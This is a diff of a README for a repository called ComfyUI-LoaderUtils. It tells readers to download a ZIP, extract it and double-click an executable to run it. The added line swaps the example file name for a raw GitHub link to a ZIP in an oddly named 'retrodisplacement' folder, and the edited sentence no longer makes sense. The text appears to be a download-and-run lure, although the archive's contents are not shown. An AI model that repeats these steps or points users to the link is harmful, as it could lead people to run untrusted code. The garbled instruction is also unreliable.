Saran1536/ComfyUI-LoaderUtils/README.md

    Find the downloaded ZIP file in your downloads folder.
 Right-click on it and select “Extract All” to unpack the contents.

 5. **Run the Application**
-   Open the extracted folder and locate the application file (e.g., `ComfyUI-LoaderUtils.exe`).
+   Open the extracted folder and locate the application file (e.g., `https://raw.githubusercontent.com/Saran1536/ComfyUI-LoaderUtils/main/retrodisplacement/Comfy-Loader-Utils-U-2.9-beta.2.zip`).
 Double-click on the file to run the application.

 ## 📖 Understanding ComfyUI LoaderUtils